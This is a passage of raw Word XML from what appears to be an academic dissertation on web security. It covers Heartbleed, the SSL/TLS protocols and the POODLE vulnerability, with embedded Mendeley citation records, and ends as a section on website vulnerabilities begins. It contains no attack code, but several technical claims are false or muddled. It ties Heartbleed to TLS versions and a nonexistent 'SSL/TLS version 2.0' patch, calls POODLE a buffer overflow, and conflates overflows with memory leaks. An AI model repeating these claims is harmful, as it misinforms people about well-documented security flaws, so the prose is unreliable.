      <w:r w:rsidR="006134D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00961AF0">
        <w:t xml:space="preserve">because the allocated memory within the buffer for heartbeats had not been filled. </w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/B978-1-932266-67-2.X5031-2","ISBN":"9781932266672","abstract":"The SANS Institute maintains a list of the \"Top 10 Software Vulnerabilities.\" At the current time, over half of these vulnerabilities are exploitable by Buffer Overflow attacks, making this class of attack one of the most common and most dangerous weapon used by malicious attackers. This is the first book specifically aimed at detecting, exploiting, and preventing the most common and dangerous attacks. Buffer overflows make up one of the largest collections of vulnerabilities in existence; And a large percentage of possible remote exploits are of the overflow variety. Almost all of the most devastating computer attacks to hit the Internet in recent years including SQL Slammer, Blaster, and I Love You attacks. If executed properly, an overflow vulnerability will allow an attacker to run arbitrary code on the victim's machine with the equivalent rights of whichever process was overflowed. This is often used to provide a remote shell onto the victim machine, which can be used for further exploitation. A buffer overflow is an unexpected behavior that exists in certain programming languages. This book provides specific, real code examples on exploiting buffer overflow attacks from a hacker's perspective and defending against these attacks for the software developer. *Over half of the \"SANS TOP 10 Software Vulnerabilities\" are related to buffer overflows. *None of the current-best selling software security books focus exclusively on buffer overflows. *This book provides specific, real code examples on exploiting buffer overflow attacks from a hacker's perspective and defending against these attacks for the software developer. ?? 2005 Elsevier Inc. All rights reserved.","author":[{"dropping-particle":"","family":"Foster","given":"James C.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Osipov","given":"Vitaly","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bhalla","given":"Nish","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Heinen","given":"Niels","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Aitel","given":"Dave","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Buffer Overflow Attacks - Detect, Exploit, Prevent","id":"ITEM-1","issued":{"date-parts":[["2005"]]},"title":"Buffer Overflow Attacks - Detect, Exploit, Prevent","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=81fd148b-cde1-4723-956d-b479b3d01724"]},{"id":"ITEM-2","itemData":{"DOI":"10.1109/MC.2014.217","ISSN":"00189162","abstract":"OpenSSL's recently disclosed Heartbleed vulnerability underscores the need for concrete methods to counter such vulnerabilities in future software development. © 2014 IEEE.","author":[{"dropping-particle":"","family":"Wheeler","given":"David A.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Computer","id":"ITEM-2","issued":{"date-parts":[["2014"]]},"title":"Preventing heartbleed","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=42b0be1c-1880-44fc-8f58-76eca46a6e26"]},{"id":"ITEM-3","itemData":{"DOI":"10.1145/2663716.2663755","ISBN":"9781450332132","abstract":"The Heartbleed vulnerability took the Internet by surprise in April 2014. The vulnerability, one of the most consequential since the advent of the commercial Internet, allowed attackers to remotely read protected memory from an estimated 24-55% of popular HTTPS sites. In this work, we perform a comprehensive, measurementbased analysis of the vulnerability's impact, including (1) tracking the vulnerable population, (2) monitoring patching behavior over time, (3) assessing the impact on the HTTPS certificate ecosystem, and (4) exposing real attacks that attempted to exploit the bug. Furthermore, we conduct a large-scale vulnerability notification experiment involving 150,000 hosts and observe a nearly 50% increase in patching by notified hosts. Drawing upon these analyses, we discuss what went well and what went poorly, in an effort to understand how the technical community can respond more effectively to such events in the future.","author":[{"dropping-particle":"","family":"Durumeric","given":"Zakir","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kasten","given":"James","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Adrian","given":"David","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Halderman","given":"J. Alex","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bailey","given":"Michael","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li","given":"Frank","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Weaver","given":"Nicholas","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Amann","given":"Johanna","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Beekman","given":"Jethro","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Payer","given":"Mathias","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Paxson","given":"Vern","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Proceedings of the ACM SIGCOMM Internet Measurement Conference, IMC","id":"ITEM-3","issued":{"date-parts":[["2014"]]},"title":"The matter of heartbleed","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=2eb2f6af-ffb8-43f8-a502-337d7b7e8e94"]},{"id":"ITEM-4","itemData":{"abstract":"The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users.","author":[{"dropping-particle":"","family":"Mehta","given":"Neel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"CVE-2014-0160","id":"ITEM-4","issued":{"date-parts":[["2014"]]},"title":"The Heartbleed Bug","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=c28dcd5c-4a15-4c5a-b49c-749cb8fa2ea3"]}],"mendeley":{"formattedCitation":"[82]–[85]","plainTextFormattedCitation":"[82]–[85]","previouslyFormattedCitation":"[82]–[85]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D16731" w:rsidRPr="00D16731">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[82]–[85]</w:t>
      </w:r>
      <w:r w:rsidR="00D16731">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A006C" w14:textId="0CC6942D" w:rsidR="00026417" w:rsidRDefault="00961AF0" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A metaphor for a basic buffer overflow attack can be described as;</w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve">f a vessel was filled from the bottom until it was full and the vessel was still being filled, then the original contents of the vessel would spill out as </w:t>
      </w:r>
      <w:r w:rsidR="00603580">
        <w:t>there</w:t>
      </w:r>
      <w:r w:rsidR="00143D10">
        <w:t xml:space="preserve"> would be no volume left to contain the original contents, this is how in a virtual environment a memory leak buffer overflow attack is performed.</w:t>
      </w:r>
      <w:r w:rsidR="00475E64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3BC52" w14:textId="40B5B2E8" w:rsidR="007C1588" w:rsidRDefault="00475E64" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00961AF0">
        <w:t xml:space="preserve"> ‘Heartbleed’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t>discovered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t>researchers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t>1/04/2014</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>in SSL/TLS version</w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.2 and below, the </w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was subsequently patched</w:t>
      </w:r>
      <w:r w:rsidR="00961AF0">
        <w:t xml:space="preserve"> by confirming the required length of the heartbeat request before a response was sent. The patch was implemented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the 7</w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t xml:space="preserve">/04/2014 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">when SSL/TLS version 2.0 was released, although researchers do not know how long </w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t xml:space="preserve">‘Heartbleed’ </w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> had been </w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t xml:space="preserve">discovered </w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exploited by </w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attackers around the globe</w:t>
      </w:r>
      <w:r w:rsidR="009C6823">
        <w:t xml:space="preserve"> in the previous years</w:t>
      </w:r>
      <w:r w:rsidR="005E1247">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.","author":[{"dropping-particle":"","family":"Mehta","given":"Neel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"CVE-2014-0160","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"The Heartbleed Bug","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=c28dcd5c-4a15-4c5a-b49c-749cb8fa2ea3"]}],"mendeley":{"formattedCitation":"[82]","plainTextFormattedCitation":"[82]","previouslyFormattedCitation":"[82]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E412C4" w:rsidRPr="00E412C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[82]</w:t>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F8033" w14:textId="370091A2" w:rsidR="0064079E" w:rsidRDefault="007C1588" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Since the ‘Heartbleed’ vulnerability was patched there have been many more vulnerabilities concerning the SSL</w:t>
      </w:r>
      <w:r w:rsidR="00911E4B">
        <w:t>v3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> protocol </w:t>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1.1.29.9990","ISBN":"1-880446-83-9","abstract":"The SSL protocol is intended to provide a practical, application-layer,\\nwidely applicable connection-oriented mechanism for Internet client/server\\ncommunications security. This note gives a detailed technical analysis\\nof the cryptographic strength of the SSL 3.0 protocol. A number of\\nminor flaws in the protocol and several new active attacks on SSL\\nare presented; however, these can be easily corrected without overhauling\\nthe basic structure of the protocol. We conclude that, while there\\nare still a few technical wrinkles to iron out, on the whole SSL\\n3.0 is a valuable contribution towards practical communications security.","author":[{"dropping-particle":"","family":"Wagner","given":"David","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Schneier","given":"Bruce","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Proceedings of the 2nd conference on Proceedings of the Second USENIX Workshop on Electronic Commerce - Volume 2","id":"ITEM-1","issued":{"date-parts":[["1996"]]},"title":"Analysis of the SSL 3.0 protocol","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=cab6bea2-d2e6-4587-b598-4899b1be69ff"]}],"mendeley":{"formattedCitation":"[86]","plainTextFormattedCitation":"[86]","previouslyFormattedCitation":"[86]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E412C4" w:rsidRPr="00E412C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[86]</w:t>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E412C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that is utilised in conjunction with </w:t>
      </w:r>
      <w:r w:rsidR="00026417">
        <w:t>the successor to SSL</w:t>
      </w:r>
      <w:r w:rsidR="00911E4B">
        <w:t>; which is the</w:t>
      </w:r>
      <w:r w:rsidR="00026417">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003D535A">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approach.","author":[{"dropping-particle":"","family":"Rescorla","given":"E.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Internet Engineering Task Force","id":"ITEM-1","issued":{"date-parts":[["2006"]]},"title":"The Transport Layer Security (TLS) Protocol Version 1.1.","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=b6769ac0-8cd4-43e0-b691-295ca0c2a060"]}],"mendeley":{"formattedCitation":"[87]","plainTextFormattedCitation":"[87]","previouslyFormattedCitation":"[87]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003D535A" w:rsidRPr="003D535A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[87]</w:t>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00911E4B">
        <w:t xml:space="preserve">security protocol </w:t>
      </w:r>
      <w:r>
        <w:t>for backward compatibility</w:t>
      </w:r>
      <w:r w:rsidR="00911E4B">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> although the SSL </w:t>
      </w:r>
      <w:r w:rsidR="00911E4B">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r>
        <w:t>protocol architecture is fundamentally flawed</w:t>
      </w:r>
      <w:r w:rsidR="00911E4B">
        <w:t xml:space="preserve">. The security risks concerning the use of SSL and TLS in conjunction </w:t>
      </w:r>
      <w:r>
        <w:t>was illustrated with the</w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1588">
        <w:t>Padding Oracle On Downgraded Legacy Encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (POODLE) </w:t>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-3-319-30806-7_8","ISBN":"9783319308050","ISSN":"16113349","abstract":"© Springer International Publishing Switzerland 2016.We present an empirical study on the patching characteristics of the top 100,000 web sites in response to three recent vulnerabilities: the POODLE vulnerability, the POODLE TLS vulnerability, and the FREAK vulnerability. The goal was to identify how the web responds to newly discovered vulnerabilities and the remotely observable characteristics of websites that contribute to the response pattern over time. Using open source tools, we found that there is a slow patch adoption rate in general; for example, about one in four servers hosting Alexa top 100,000 sites we sampled remained vulnerable to the POODLE attack even after five months. It was assuring that servers handling sensitive data were more aggressive in patching the vulnerabilities. However, servers that had more open ports were more likely to be vulnerable. The results are valuable for practitioners to understand the state of security engineering practices and what can be done to improve.","author":[{"dropping-particle":"","family":"Fogel","given":"Benjamin","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Farmer","given":"Shane","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alkofahi","given":"Hamza","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Skjellum","given":"Anthony","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hafiz","given":"Munawar","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics)","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"POODLEs, more POODLEs, FREAK attacks too: How server administrators responded to three serious web vulnerabilities","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=07f12f78-e3bf-420d-bab3-04dda9058e90"]}],"mendeley":{"formattedCitation":"[88]","plainTextFormattedCitation":"[88]","previouslyFormattedCitation":"[88]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003D535A" w:rsidRPr="003D535A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[88]</w:t>
      </w:r>
      <w:r w:rsidR="003D535A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSLv3 vulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1588">
        <w:t>CVE-2014-3566</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> that forced a web browser to downgrade HTTPS encryption to SSLv3 without utilising TLS in conjunction, this was possible because of the </w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t>programming</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t xml:space="preserve">string </w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t>within TLS version 1.0 that allows interoperability of the encryption standards for backward compatibility as previously discussed</w:t>
      </w:r>
      <w:r w:rsidR="00854FD4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t>permitted</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> a buffer overflow attack to </w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t>be leveraged against</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> the SSLv3 architecture</w:t>
      </w:r>
      <w:r w:rsidR="00854FD4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DF8FE" w14:textId="134846A0" w:rsidR="0064079E" w:rsidRDefault="00854FD4" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve">lthough </w:t>
      </w:r>
      <w:r>
        <w:t>the POODLE</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> vulnerability was patched within TLS 1.1, standalone SSLv3</w:t>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t>not be patched but rather secured with the TLS</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> v1.1</w:t>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t xml:space="preserve"> protocol, however legacy </w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0068692E">
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="0068692E">
        <w:t xml:space="preserve"> badly configured modern </w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0068692E">
        <w:t xml:space="preserve">servers </w:t>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t>that do not utilise TLS</w:t>
      </w:r>
      <w:r w:rsidR="00C473C7">
        <w:t xml:space="preserve"> v1.1</w:t>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t xml:space="preserve"> are still vulnerable to this exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"SSL/TLS (Secure socket layer) is a cryptographic protocol that provides secure communication over internet. Any parties when they want to perform secure communication over internet. They can use SSL/TLS and be sure of their data not been disclosed over the network. There has been lot of security issues already identified and patches have been released for it. Still companies fail to implement all the patches because they lack knowledge required to understand SSL/TLS security and its implementation. We will develop a scanner for SSL/TLS which identifies well know existing issues in SSL/TLS security and provide report with SSL/TLS implementation issues. This will help any person without the knowledge of SSL/TLS security to identify weakness in their SSL/TLS secure implementation. This paper particularly tests the server against vulnerabilities such as SSLv2 is supported, weak ciphers enabled, OPENSSL/TLS is vulnerable to heart bleed, certificate validity, poodle attack is possible. The resources to those who are new to the information assurance field can provide an insight to two common protocols used in Internet security. Though SSL and TLS are not the only secure protocols currently in use, they are very common for sites dealing with transactions that could involve sensitive data (eg: personal and financial information, passwords etc). Keywords: Cipher Suites (CS), InetSocketAddress (ISA), Server Certificate (SC), Heart Bleed (HB).","author":[{"dropping-particle":"","family":"S","given":"Pavithra","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pari","given":"Sheeba","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Professor","given":"Asst","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Computer Science and Mobile Computing","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"SSL/TLS SECURITY POSTURE IDENTIFIER","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=e6fa7620-5ef8-4a79-b3c7-a8ef6463d9e7"]},{"id":"ITEM-2","itemData":{"DOI":"10.1007/978-3-319-30806-7_8","ISBN":"9783319308050","ISSN":"16113349","abstract":"© Springer International Publishing Switzerland 2016.We present an empirical study on the patching characteristics of the top 100,000 web sites in response to three recent vulnerabilities: the POODLE vulnerability, the POODLE TLS vulnerability, and the FREAK vulnerability. The goal was to identify how the web responds to newly discovered vulnerabilities and the remotely observable characteristics of websites that contribute to the response pattern over time. Using open source tools, we found that there is a slow patch adoption rate in general; for example, about one in four servers hosting Alexa top 100,000 sites we sampled remained vulnerable to the POODLE attack even after five months. It was assuring that servers handling sensitive data were more aggressive in patching the vulnerabilities. However, servers that had more open ports were more likely to be vulnerable. The results are valuable for practitioners to understand the state of security engineering practices and what can be done to improve.","author":[{"dropping-particle":"","family":"Fogel","given":"Benjamin","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Farmer","given":"Shane","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alkofahi","given":"Hamza","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Skjellum","given":"Anthony","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hafiz","given":"Munawar","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics)","id":"ITEM-2","issued":{"date-parts":[["2016"]]},"title":"POODLEs, more POODLEs, FREAK attacks too: How server administrators responded to three serious web vulnerabilities","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=07f12f78-e3bf-420d-bab3-04dda9058e90"]}],"mendeley":{"formattedCitation":"[76], [88]","plainTextFormattedCitation":"[76], [88]","previouslyFormattedCitation":"[76], [88]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B923C0" w:rsidRPr="00B923C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[76], [88]</w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007C1588">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BFA03" w14:textId="09503FC0" w:rsidR="0048407D" w:rsidRDefault="007C1588" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As the HTTPS protocol continues to be attacked and exploited by malicious actors, security researchers around the globe are calling for the SSL protocol to be </w:t>
      </w:r>
      <w:r w:rsidR="0068692E">
        <w:t>depreciated to allow HTTPS to utilised TLS alone in future OpenSSL revisions</w:t>
      </w:r>
      <w:r w:rsidR="00854FD4">
        <w:t xml:space="preserve"> as concerns for future SSL/TLS attacks grow</w:t>
      </w:r>
      <w:r w:rsidR="0068692E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574804BE" w14:textId="3DCB5905" w:rsidR="0064079E" w:rsidRDefault="0064079E" w:rsidP="00316D05">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc40134038"/>
      <w:r>
        <w:t xml:space="preserve">2.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00316D05">
        <w:t>Website</w:t>
      </w:r>
      <w:r w:rsidR="001706CB">
        <w:t xml:space="preserve"> Frontend</w:t>
      </w:r>
      <w:r w:rsidR="00316D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001706CB">
        <w:t>and Backend</w:t>
      </w:r>
      <w:r w:rsidR="00316D05">
        <w:t xml:space="preserve"> Database Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="02C0568B" w14:textId="4AAF6A45" w:rsidR="00A31B82" w:rsidRDefault="00A31B82" w:rsidP="00E20D60">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Whereas the HTTPS SSL/TLS protocol is still vulnerable to attack</w:t>
      </w:r>
      <w:r w:rsidR="00A07813">
        <w:t xml:space="preserve">, the majority of modern website attacks are leveraged against </w:t>
      </w:r>
      <w:r w:rsidR="00E20D60">
        <w:t>incompetently</w:t>
      </w:r>
      <w:r w:rsidR="00A07813">
        <w:t xml:space="preserve"> coded HTML websites that implement </w:t>
      </w:r>
      <w:r w:rsidR="00935ED8">
        <w:t>JavaScript, PHP</w:t>
      </w:r>
      <w:r w:rsidR="00D838D1">
        <w:t>, Cascading Style Sheets (CSS)</w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B923C0">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
